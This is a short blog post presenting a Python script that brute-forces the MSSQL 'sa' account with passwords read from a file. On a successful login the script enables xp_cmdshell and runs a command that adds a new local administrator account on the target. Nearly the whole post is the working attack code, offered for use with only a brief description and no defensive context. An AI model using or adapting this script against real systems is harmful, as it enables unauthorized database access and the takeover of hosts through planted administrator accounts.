RSS

SQL Brute Force Script

16 Jan

The purpose of this script is to perform a brute force attack on an SQL database.The script will try to connect to the remote host with the administrative account sa and with one password that will be valid from the file pass.txt.If the connection is successful then it will try to enable the xp_cmdshell and add a new user on the remote host.

Author: Larry Spohn

Website: http://e-spohn.com

Twitter: @Spoonman1091

Credits: Dave Kennedy

#!/usr/bin/python

import _mssql

# mssql = _mssql.connect('ip', 'username', 'password')
# mssql.execute_query()

passwords = file("pass.txt", "r")
ip = "192.168.200.128"

for password in passwords:
password = password.rstrip()
try:
mssql = _mssql.connect(ip, "sa", password)

print "[*] Successful login with username 'sa' and password: " + password
print "[*] Enabling 'xp_cmdshell'"
mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE;")
mssql.execute_query("RECONFIGURE;")

print "[*] Adding Administrative user"
mssql.execute_query("xp_cmdshell 'net user netbiosX Password! /ADD && net localgroup administrators netbiosX /ADD'")
mssql.close()

print "[*] Success!"
break

except:
print "[!] Failed login for username 'sa' and password: " + password

About these ads
 
Leave a comment

Posted by on January 16, 2013 in Coding

 

Tags: , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.

Join 619 other followers

%d bloggers like this: